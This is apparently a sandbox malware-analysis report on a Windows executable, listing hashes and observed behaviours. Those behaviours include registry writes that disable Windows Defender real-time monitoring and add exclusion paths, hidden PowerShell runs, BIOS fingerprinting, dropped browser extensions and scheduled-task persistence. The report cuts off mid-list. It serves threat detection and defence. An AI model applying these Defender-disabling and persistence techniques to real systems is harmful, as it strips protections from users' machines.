Analysis
-
max time kernel
135s -
max time network
144s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64 arch:x86 image:win7-20240221-en locale:en-us os:windows7-x64 system -
submitted
02/06/2024, 01:02
Static task
static1
Behavioral task
behavioral1
Sample
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
Resource
win7-20240221-en
General
-
Target
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe
-
Size
7.3MB
-
MD5
0c9f3e28ab69a267a1fff9fe9ae9f516
-
SHA1
1cf6dbc3e6e3ee82254a201dc9c87a12f08c1e31
-
SHA256
0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a
-
SHA512
dc273d9860b8610b338cbfa0c922b7c4a9f6b68308957d2dea0d2124bd659ec0b04781321be3a3f66bc22d02992d8347c386bcceffe6fe49b58ae295e4154a27
-
SSDEEP
98304:91OC/3dy4gMqA3Varui/uMoMm1/df1kj+wIL7RyLGLlSjAzfC0SitAnoVB28nXNP:91OCPjobQ/R7we7E3uSvn7e9dkzrrza
Malware Config
Signatures
-
Disables Windows Defender real-time monitoring via the policy key (DisableRealtimeMonitoring = 1, written with reg.exe)
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe 
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QtKEgKYoTGTqC = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\DQsmlqqwNqJuTewVy = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZEkGlaTFWGUn = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows 
Defender\Exclusions\Paths\C:\Program Files (x86)\dlfHiRefefjU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\hsUwQAlMU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\nivjmgppGaMJQQVB = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\QqEAMUespgTHJnVz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Runs PowerShell with its display window hidden (e.g. `start-process -WindowStyle Hidden`, as seen in the process tree below), keeping interpreter activity out of the user's view.
pid Process 2580 powershell.exe 3036 powershell.exe 2984 powershell.exe 2596 powershell.exe 2536 powershell.exe 1816 powershell.exe 268 powershell.exe 980 powershell.EXE 2292 powershell.EXE 640 powershell.EXE -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information (here SystemBiosVersion) is often read to fingerprint the machine and detect virtualised or sandboxed analysis environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up the country code configured in the registry (Control Panel\International\Geo\Nation), likely used to geofence execution to or away from particular regions.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-330940541-141609230-1670313778-1000\Control Panel\International\Geo\Nation eNYRCkf.exe -
Executes dropped EXE 4 IoCs
pid Process 2884 Install.exe 2544 Install.exe 2272 yMUNleu.exe 2028 eNYRCkf.exe -
Loads dropped DLL 15 IoCs
pid Process 2648 0e71a052082e443d1027c268d81b8071e00660a8fe20e4a5b396878f9ce7523a.exe 2884 Install.exe 2884 Install.exe 2884 Install.exe 2884 Install.exe 2544 Install.exe 2544 Install.exe 2544 Install.exe 1604 WerFault.exe 1604 WerFault.exe 1604 WerFault.exe 1140 rundll32.exe 1140 rundll32.exe 1140 rundll32.exe 1140 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate the software installed on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json eNYRCkf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json eNYRCkf.exe -
Drops file in System32 directory 26 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini yMUNleu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 eNYRCkf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 eNYRCkf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_798B036C05F381321FD6C3F00885C62F eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_DBD1FAADD656881B5EBDBC1DB3D60301 
eNYRCkf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6B69C29B30EAF4FCF9E240B3D6A77FC9 eNYRCkf.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol yMUNleu.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat eNYRCkf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA eNYRCkf.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA eNYRCkf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini yMUNleu.exe File opened for modification 
C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol eNYRCkf.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol yMUNleu.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files (x86)\ZEkGlaTFWGUn\MVNneNA.dll eNYRCkf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi eNYRCkf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja eNYRCkf.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\FMMsqqA.xml eNYRCkf.exe File created C:\Program Files (x86)\hsUwQAlMU\WchfhUg.xml eNYRCkf.exe File created C:\Program Files (x86)\dlfHiRefefjU2\fzhkqIFMOIlOb.dll eNYRCkf.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\AnjiESz.dll eNYRCkf.exe File created C:\Program Files (x86)\QtKEgKYoTGTqC\ViiciBn.xml eNYRCkf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak eNYRCkf.exe File created C:\Program Files (x86)\NuNDxVhSfKiQUmJwJAR\uIkTWbH.dll eNYRCkf.exe File created C:\Program Files (x86)\dlfHiRefefjU2\bifBtEe.xml eNYRCkf.exe File created C:\Program Files (x86)\hsUwQAlMU\zkIMIO.dll eNYRCkf.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi eNYRCkf.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\btZaCbGShXZoJDfvCg.job schtasks.exe File created C:\Windows\Tasks\ZTNkTKukmvvbOMPkn.job schtasks.exe File created C:\Windows\Tasks\ucrVpivlTlXwlAC.job schtasks.exe File created C:\Windows\Tasks\BjyVbWVaXyfCTlHuI.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to enumerate or interact with connected physical storage and optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 1604 2272 WerFault.exe 64 2604 2544 WerFault.exe 29 2736 2028 WerFault.exe 227 -
Creates scheduled task(s) 1 TTPs 12 IoCs
schtasks.exe is commonly used by malware to establish persistence or to schedule post-infection execution.
pid Process 1976 schtasks.exe 2916 schtasks.exe 2856 schtasks.exe 2456 schtasks.exe 1608 schtasks.exe 1872 schtasks.exe 2752 schtasks.exe 1092 schtasks.exe 420 schtasks.exe 1784 schtasks.exe 1788 schtasks.exe 1164 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D7D33897-E920-4B4C-BF10-C6A364CD478E} eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D7D33897-E920-4B4C-BF10-C6A364CD478E}\WpadDecisionReason = "1" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs eNYRCkf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0085000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" yMUNleu.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Key created 
\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings eNYRCkf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d\WpadDecisionTime = 60653cd588b4da01 eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\82-f1-3d-f4-cb-9d\WpadDecision = "0" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" yMUNleu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ eNYRCkf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached yMUNleu.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs eNYRCkf.exe Set value (int) 
\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs eNYRCkf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs eNYRCkf.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2536 powershell.exe 2536 powershell.exe 2536 powershell.exe 1816 powershell.exe 268 powershell.exe 268 powershell.exe 268 powershell.exe 980 powershell.EXE 980 powershell.EXE 980 powershell.EXE 2292 powershell.EXE 2292 powershell.EXE 2292 powershell.EXE 2580 powershell.exe 640 powershell.EXE 640 powershell.EXE 640 powershell.EXE 3036 powershell.exe 3036 powershell.exe 3036 powershell.exe 2596 powershell.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2984 powershell.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe 2028 eNYRCkf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2536 powershell.exe Token: SeDebugPrivilege 1816 powershell.exe Token: SeIncreaseQuotaPrivilege 2588 WMIC.exe Token: SeSecurityPrivilege 2588 WMIC.exe Token: SeTakeOwnershipPrivilege 2588 WMIC.exe Token: SeLoadDriverPrivilege 2588 WMIC.exe Token: SeSystemProfilePrivilege 2588 WMIC.exe Token: SeSystemtimePrivilege 2588 WMIC.exe Token: SeProfSingleProcessPrivilege 2588 WMIC.exe Token: SeIncBasePriorityPrivilege 2588 WMIC.exe Token: SeCreatePagefilePrivilege 2588 WMIC.exe Token: SeBackupPrivilege 2588 WMIC.exe Token: SeRestorePrivilege 2588 WMIC.exe Token: SeShutdownPrivilege 2588 WMIC.exe Token: SeDebugPrivilege 2588 WMIC.exe Token: SeSystemEnvironmentPrivilege 2588 WMIC.exe Token: SeRemoteShutdownPrivilege 2588 WMIC.exe Token: SeUndockPrivilege 2588 WMIC.exe Token: SeManageVolumePrivilege 2588 WMIC.exe Token: 33 2588 WMIC.exe Token: 34 2588 WMIC.exe Token: 35 2588 WMIC.exe Token: SeDebugPrivilege 268 powershell.exe Token: SeDebugPrivilege 980 powershell.EXE Token: SeDebugPrivilege 2292 powershell.EXE Token: SeDebugPrivilege 2580 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2792 WMIC.exe Token: SeIncreaseQuotaPrivilege 2792 WMIC.exe Token: SeSecurityPrivilege 2792 WMIC.exe Token: SeTakeOwnershipPrivilege 2792 WMIC.exe Token: SeLoadDriverPrivilege 2792 WMIC.exe Token: SeSystemtimePrivilege 2792 WMIC.exe Token: SeBackupPrivilege 2792 WMIC.exe Token: SeRestorePrivilege 2792 WMIC.exe Token: SeShutdownPrivilege 2792 WMIC.exe Token: SeSystemEnvironmentPrivilege 2792 WMIC.exe Token: SeUndockPrivilege 2792 WMIC.exe Token: SeManageVolumePrivilege 2792 WMIC.exe Token: SeDebugPrivilege 640 powershell.EXE Token: SeDebugPrivilege 3036 powershell.exe Token: SeDebugPrivilege 2596 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2968 WMIC.exe Token: SeIncreaseQuotaPrivilege 2968 WMIC.exe Token: SeSecurityPrivilege 2968 WMIC.exe Token: SeTakeOwnershipPrivilege 2968 WMIC.exe Token: SeLoadDriverPrivilege 2968 WMIC.exe Token: 
